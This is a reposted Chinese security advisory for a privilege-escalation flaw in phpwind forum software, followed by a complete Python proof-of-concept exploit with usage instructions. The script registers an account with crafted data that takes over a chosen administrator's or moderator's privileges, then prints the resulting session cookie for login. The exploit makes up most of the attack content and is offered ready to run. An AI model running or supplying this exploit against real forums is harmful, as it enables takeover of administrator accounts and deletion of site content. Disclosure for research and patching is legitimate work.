鬼仔:利用程序是Python写的。
漏洞发布:http://www.80sec.com/
漏洞作者:[email protected]
漏洞厂商: http://www.phpwind.com/ 本漏洞影响phpwind所有版本
漏洞危害:高
漏洞说明:phpwind是国内使用非常广泛的一款程序,由于在程序设计上存在错误,导致任何人可以取得前台管理员及斑主权限,做删除帖子等任意操作
利用方式:http://www.80sec.com有提供exploit
漏洞分析:由于phpwind论坛在设计上对数据库存储机制不了解,导致在程序逻辑上判断有问题,用精心构造的数据注册用户即可获得管理权限
漏洞修补:建议关闭注册功能等待官方出补丁
漏洞状态:
08.5.25发现此漏洞
08.6.1由80sec.com公开此漏洞
暂无补丁
原始地址:http://www.80sec.com/release/phpwind-exploit.txt
漏洞测试:
# -*- coding: gb2312 -*- import urllib2,httplib,sys httplib.HTTPConnection.debuglevel = 1 cookies = urllib2.HTTPCookieProcessor() opener = urllib2.build_opener(cookies) def banner(): print "" print "########################################################" print "Phpwind所有版本管理权限泄露漏洞利用poc" print "Copyright (C) 2006" print "[email protected]" print "80sec是一个新的致力于web安全的小团体" print "http://www.80sec.com" def usage(): banner() print "Usage:/n" print " $ ./phpwind.py pwforumurl usertoattack/n" print " pwforumurl 目标论坛地址如http://www.80sec.com/" print " usertoattack 目标拥有权限的斑竹或管理员" print " 攻击结果将会在目标论坛注册一个和目标用户一样的帐户" print " 最新版本可以使用uid登陆" print " 其他版本可以使用cookie+useragent登陆" print "########################################################" print "" argvs=sys.argv usage() data = "[email protected][email protected][email protected]®emailtoall=1&step=2" % (argvs[2],"%c1") pwurl = "%s/register.php" % argvs[1] request = urllib2.Request( url = pwurl , headers = {'Content-Type' : 'application/x-www-form-urlencoded','User-Agent': '80sec owned this'}, data = data) f=opener.open(request) headers=f.headers.dict cookie=headers["set-cookie"] try: if cookie.index('winduser'): print "Exploit Success!" print "Login with uid password @80sec or Cookie:" print cookie print "User-agent: 80sec owned this" except: print "Error! http://www.80sec.com" print "Connect root#80sec.com"免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论